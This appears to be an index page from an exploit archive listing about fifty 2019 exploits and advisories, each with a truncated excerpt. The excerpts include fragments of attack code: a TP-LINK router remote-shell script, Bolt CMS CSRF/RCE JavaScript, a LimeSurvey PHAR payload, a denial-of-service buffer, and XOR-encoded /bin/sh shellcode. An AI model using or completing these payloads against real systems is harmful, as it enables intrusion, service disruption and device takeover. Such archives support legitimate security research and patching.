Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: Download Accelerator Plus DAP 10.0.6.0 - SEH Buffer Overflow Date: 2019-04-05 Vendor Homepage: http://www.speedbit.com/dap/ Software Link: http://www.speedbit.com/dap/download/downloading.asp Exploit Author:...
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Shoretel Connect Multiple Vulnerability Google Dork: inurl:/signin.php?ret= Author: Ramikan Vendor Homepage: https://www.shoretel.com/ Software Link: https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview...
TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow Exploit
Author Grzegorz Wypych - h0rac TP-LINK TL-WR940N/TL-WR941ND buffer overflow remote shell exploit import requests import md5 import base64 import string import struct import socket password = md5.new'admin'.hexdigest cookie = base64.b64encode'admin:'+password print '+ Authorization cookie: ', cook...
Linux/x64 - XANAX Encoder Shellcode (127 bytes)
Linux/x64 - XANAX Encoder Shellcode 127 bytes ; Date: 08/04/2019 ; XANAX Encoder ; Author: Alan Vivona ; Description: Uses xor-add-not-add-xor sequence with a 4 byte key and writes the encoded version to stdout ; Tested on: x86-x64 GNU/Linux global start segment .data keys.xor1 equ 0x29 keys.add1...
Jobgator - experience SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: NCrypted Jobgator - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.ncrypted.net/jobgator/ Demo Site: https://demo.ncryptedprojects.com/jobgator/ Version: Latest Tested on: Kali Linux CVE: N/A -----...
ManageEngine ServiceDesk Plus 9.3 - User Enumeration Vulnerability
Exploit for php platform in category web applications Exploit Title: ManageEngine ServiceDesk Plus - 9.3 User enumeration vulnerability Exploit Author: Alexander Bluestein Vendor Homepage: https://www.manageengine.com/ Software Link: https://www.manageengine.com/products/service-desk/download.htm...
Ashop Shopping Cart Software - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Ashop Shopping Cart Software - SQL Injection Exploit Author: Doğukan Karaciğer Vendor Homepage: http://www.ashopsoftware.com Software Link: https://sourceforge.net/projects/ashop/ Demo Site: http://demo.ashopsoftware.com/ Versio...
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution Exploit
Exploit for php platform in category web applications history.pushState'', '', '/' function exploit var target = "http://127.0.0.1" var boltadminurl = target + "/bolt"; var xhr = new XMLHttpRequest; xhr.open"POST", boltadminurl + "/upload", true; xhr.setRequestHeader"Accept", "application/json,...
WordPress Limit Login Attempts Reloaded 2.7.4 Bypass Exploit
WordPress Limit Login Attempts Reloaded plugin version 2.7.4 suffers from a login limit bypass vulnerability. !/usr/bin/env node const request = require"request" / Exploit Title: Limit Login Attempts Reloaded by WPChef rate limiter bypass Date: 2019-04-08 Exploit Author: isdampe Software Link:...
QNAP Netatalk < 3.1.12 - Authentication Bypass Exploit
Exploit Title: QNAP Netatalk Authentication Bypass Original Exploit Author: Jacob Baines Modifications for QNAP devices: Mati Aharoni Vendor Homepage: http://netatalk.sourceforge.net/ Software Link: https://sourceforge.net/projects/netatalk/files/ Version: Before 3.1.12 CVE : CVE-2018-1160...
Apache 2.4.17 < 2.4.38 - apache2ctl graceful (logrotate) Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits ?php CARPE DIEM: CVE-2019-0211 Apache Root Privilege Escalation Charles Fol @cfreal INFOS https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html USAGE 1. Upload exploit to Apache HTTP server 2. Send request to page 3. Await...
Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation Exploit
Exploit for windows platform in category web applications !/usr/bin/python Exploit Title: Manage Engine ServiceDesk Plus Version 9.3 Privileged Account Hijacking Exploit Author: Ata Hakçıl, Melih Kaan Yıldız Vendor: ManageEngine Vendor Homepage: www.manageengine.com Product: Service Desk Plus...
WordPress Contact Form Maker 1.13.1 Cross Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Contact Form by WD CSRF → LFI Exploit Author: Panagiotis Vagenas Vendor Homepage: http://web-dorado.com/ Software Link: https://wordpress.org/plugins/contact-form-maker Version: 1.13.1 Tested on: WordPress 5.1.1 Description...
Lupusec XT2 Plus Main Panel Shared Secrets / Secret Disclosure / CSRF Vulnerabilities
Lupusec XT2 Plus Main Panel with firmware 0.0.2.19E suffers from shared private keys for SSL certificates, root passwords derived from the MAC address, information disclosure, and cross site request forgery vulnerabilities. =======================================================================...
WordPress Form Maker 1.13.2 Cross Site Request Forgery / Local File Inclusion Vulnerabilities
WordPress Form Maker plugin version 1.13.2 suffers from cross site request forgery and local file inclusion vulnerabilities. Title: Form Maker by WD CSRF / LFI Exploit Author: Panagiotis Vagenas Vendor Homepage: http://web-dorado.com/ Software Link: https://wordpress.org/plugins/form-maker Versio...
WordPress 5.0.0 crop-image Shell Upload Exploit
This Metasploit module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and versions below or equal to 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the...
AIDA64 Engineer 5.99.4900 - Load from file Field Buffer Overflow (SEH) Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: AIDA64 Engineer 5.99.4900 - 'Load from file' Field Buffer Overflow SEH Exploit Author: Anurag Srivastava and Vardan Bansal Website: www.theanuragsrivastava.in Vulnerable Software: AIDA64 Engineer Vendor...
Magic ISO Maker 5.5(build 281) - Serial Code Denial of Service Exploit
-- coding: utf-8 -- Exploit Title: Magic Iso Maker 5.5build 281 - "Serial Code" Denial of Service PoC Author: Alejandra Sánchez Vendor Homepage: http://www.magiciso.com Software Link: http://www.magiciso.com/SetupMagicISO.exe Version: 5.5build 281 Tested on: Windows 10 Proof of Concept: 1.- Run t...
FreeSMS 2.1.2 - SQL Injection (Authentication Bypass) Vulnerability
Exploit for php platform in category web applications Exploit Title: FreeSMS 2.1.2 - Authentication Bypass Exploit Author: Yilmaz Degirmenci Vendor Homepage: https://freesms.sourceforge.io/ Software Link: https://sourceforge.net/projects/freesms/ Version: v2.1.2 Category: Webapps Tested on: LAMPP...
Clinic Pro v4 - month SQL Injection Vulnerability
Exploit for php platform in category web applications Title: Clinic Pro - Clinic Management Software Exploit Author: Abdullah Çelebi Vendor Homepage: https://softwebinternational.com Software Link: https://cms.softwebinternational.com Category: Webapps Tested on: WAMPP @Win Software description: ...
WebKitGTK+ - ThreadedCompositor Race Condition Exploit
@keyframes foo 0% opacity: 0; 100% opacity: 1; div animation-name: foo; animation-duration: 1s; animation-iteration-count: infinite; filter: saturate50%; frame = document.createElement"iframe"; setInterval = frame.remove; document.body.appendChildframe; doc = frame.contentDocument;...
Ashop Shopping Cart Software - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Ashop Shopping Cart Software - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: http://www.ashopsoftware.com Software Link: https://sourceforge.net/projects/ashop/ Demo Site: http://demo.ashopsoftware.com/ Versio...
SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)
SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types Type Confusion A bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects. Prerequisites In...
PhreeBooks ERP 5.2.3 - Remote Command Execution Exploit
Exploit for php platform in category web applications Exploit Title: PhreeBooks ERP 5.2.3 - Remote Command Execution Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://www.phreesoft.com/ Software Link: https://sourceforge.net/projects/phreebooks/ Version: v5.2.3 Category:...
Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - ReadableStream Internal Object Leak Type Confusi
Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - ReadableStream Internal Object Leak Type Confusion binding // These values are only used when serialization is enabled. if !RuntimeEnabledFeatures::TransferableStreamsEnabled return; v8::Local global = scriptstate-GetContext-Global; v8::Local...
iOS < 12.2 / macOS < 10.14.4 XNU - pidversion Increment During execve is Unsafe Exploit
iOS 12.2 / macOS 10.14.4 XNU - pidversion Increment During execve is Unsafe Exploit Privileged IPC services in userspace often have to verify the security context of their client processes such as whether the client is sandboxed, has a specific entitlement, or is signed by some code signing...
iScripts ReserveLogic - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: iScripts ReserveLogic - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.iscripts.com/reservelogic/ Demo Site: https://www.demo.iscripts.com/reservelogic/demo/ Version: Latest Tested on: Kali Linux...
TeemIp IPAM < 2.4.0 - new_config Command Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "TeemIp IPAM %q This module exploits a command injection vulnerability in TeemIp versions prior to 2.4.0. The "newconfig" parameter of "exec.php"...
Google Chrome 72.0.3626.81 - V8TrustedTypePolicyOptions::ToImpl Type Confusion Exploit
Google Chrome 72.0.3626.81 - V8TrustedTypePolicyOptions::ToImpl Type Confusion Exploit VULNERABILITY DETAILS The binding code generator doesn't add checks to ensure that the callback properties of a dictionary are indeed JS functions. For example, for the TrustedTypePolicyOptions dictionary:...
Google Chrome 72.0.3626.96 / 74.0.3702.0 - JSPromise::TriggerPromiseReactions Type Confusion
JSPromise::TriggerPromiseReactionsIsolate isolate, Handle reactions, Handle argument, PromiseReaction::Type type DCHECKreactions-IsSmi || reactions-IsPromiseReaction; // We need to reverse the reactions here, since we record them // on the JSPromise in the reverse order. DisallowHeapAllocation...
WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Exploit
WebKit JavaScriptCore - Out-Of-Bounds Access in FTL JIT due to LICM Moving Array Access Before the Bounds Check / While fuzzing JavaScriptCore, I encountered the following JavaScript program which crashes jsc in current HEAD and release...
PhreeBooks ERP 5.2.3 - Arbitrary File Upload Exploit
Exploit for php platform in category web applications PhreeBooks ERP v5.2.3 - Arbitrary File Upload Exploit Author: Abdullah Çelebi Vendor Homepage: https://www.phreesoft.com/ Software Link: https://sourceforge.net/projects/phreebooks/files/latest/download Category: Webapps Version: 5.2.3 Tested...
WebKit JavaScriptCore - createRegExpMatchesArray Type Confusion Exploit
/ Prerequisites ------------- In JavaScriptCore, JSObjects have an associated Structure: an object describing various aspects of the JSObject such as its type, its properties, and the type of elements being stored e.g. unboxed double or JSValues. Whenever a property is added to an object or some...
WebKit JavaScriptCore - CodeBlock Dangling Watchpoints Use-After-Free Exploit
WebKit JavaScriptCore - CodeBlock Dangling Watchpoints Use-After-Free Exploit / While fuzzing JavaScriptCore, I encountered the following simplified and commented JavaScript program which crashes jsc from current HEAD and release: / function v9 // Some watchpoint on the LexicalEnvironment is...
Fiverr Clone Script 1.2.2 - SQL Injection / Cross-Site Scripting Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Fiverr Clone Script 1.2.2 - SQL Injection / Cross Site Scripting Exploit Author: Mr Winst0n Author E-mail: email protected Vendor Homepage: https://www.phpscriptsmall.com Software Link :...
Inout RealEstate - city SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Inout RealEstate - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.inoutscripts.com/products/inout-realestate/ Demo Site: http://inout-realestate.demo.inoutscripts.net/ Version: Latest Tested on: Ka...
AIDA64 Extreme / Engineer / Network Audit 5.99.4900 - SEH Buffer Overflow (EggHunter) Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: AIDA64 Extreme 5.99.4900 - SEH Buffer Overflow EggHunter Date: 2019-04-01 Vendor Homepage: https://www.aida64.com Software Link: http://download.aida64.com/aida64extreme599.exe Mirror Link :...
AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: AIDA64 Extreme 5.99.4800 - SEH Buffer Overflow EggHunter Vendor Homepage: https://www.aida64.com Software Link: http://download.aida64.com/aida64extreme599.exe Mirror Link :...
JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: JioFi 4G M2S 1.0.2 devices have CSRF via the SSID name and Security Key field under Edit Wi-Fi Settings aka a SetWiFiSetting request to cgi-bin/qcmapwebcgi Exploit Author: Vikas Chaudhary Vendor Homepage: https://www.jio.com/...
phpFileManager 1.7.8 - Local File Inclusion Exploit
Exploit for php platform in category web applications Exploit Title: phpFileManager 1.7.8 - Local File Inclusion Exploit Author: Murat Kalafatoglu Vendor Homepage: https://sourceforge.net/projects/phpfm/ Software Demo: https://phpfm-demo.000webhostapp.com/ Version: v1.7.8 Category: Webapps Tested...
CMS Made Simple < 2.2.10 - SQL Injection Exploit
Exploit for php platform in category web applications !/usr/bin/env python Exploit Title: Unauthenticated SQL Injection on CMS Made Simple = 2.2.9 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link:...
WordPress PayPal Checkout Payment Gateway 1.6.8 Plugin - Parameter Tampering Vulnerability
Exploit for php platform in category web applications WordPress PayPal Checkout Payment Gateway 1.6.8 Plugin - Parameter Tampering Exploit Title: cgi-bin/webscr?cmd=cart in the WooCommerce PayPal Checkout Payment Gateway plugin 1.6.8 for WordPress allows Parameter Tampering in an amount parameter...
Inout EasyRooms - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Inout EasyRooms Ultimate Edition - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.inoutscripts.com/products/inout-easyrooms/ Demo Site: http://inout-easyrooms.demo.inoutscripts.net/ Version: v1.0...
AIDA64 Extreme 5.99.4900 - Logging SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/python Exploit Title: AIDA64 Extreme 5.99.4900 - Logging SEH Buffer Overflow Vendor Homepage: https://www.aida64.com Software Link: http://download.aida64.com/aida64extreme599.exe Mirror Link :...
LimeSurvey < 3.16 - Remote Code Execution Exploit
Exploit for php platform in category web applications !/usr/bin/python Description: LimeSurvey shell.php" -p phar -o /tmp/exploit.jpg PHAR = "\x3c\x3f\x70\x68\x70\x20\x5f\x5f\x48\x41\x4c\x54\x5f\x43\x4f\x4d\x50\x49\x4c\x45\x52\x28\x29\x3b\x20\x3f\x3e\x0d\x0a\x38"...
Fiverr Clone Script 1.2.2 Cross Site Scripting / SQL Injection Vulnerabilities
Exploit for php platform in category web applications Exploit Title: Fiverr Clone Script 1.2.2 - SQL Injection / Cross Site Scripting Exploit Author: Mr Winst0n Author E-mail: email protected Discovery Date: Apr 1, 2019 Vendor Homepage: https://www.phpscriptsmall.com Software Link :...
Classified Ad Lister 2.0 Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications =========================================================================================== Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload Exploit Author: Mehmet EMIROGLU Vendor Homepage:...
Chrome V8TrustedTypePolicyOptions::ToImpl Type Confusion Vulnerability
Chrome: Type confusion in V8TrustedTypePolicyOptions::ToImpl VULNERABILITY DETAILS The binding code generator doesn't add checks to ensure that the callback properties of a dictionary are indeed JS functions. For example, for the TrustedTypePolicyOptions dictionary:...
SphereFTP 2.0 Denial Of Service Exploit
!/usr/bin/python Exploit Title: SphereFTP Server v2.0 Remote Denial of Service Vulnerability Exploit Author: Sachin Wagh @tigertigerboy Software Link: http://www.menasoft.com/sphereftp/sphereftpwin32v20.zip Tested on: Windows 10 64-bit import socket import sys evil = "A"3000...
Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)
/ ; XOR-Encoder.py ; Author: Daniele Votta ; Description: This program encodes shellcode with XOR technique. ; Tested on: i686 GNU/Linux ; Shellcode Length:25 !/usr/bin/python Python XOR Encoder Execve /bin/sh shellcode...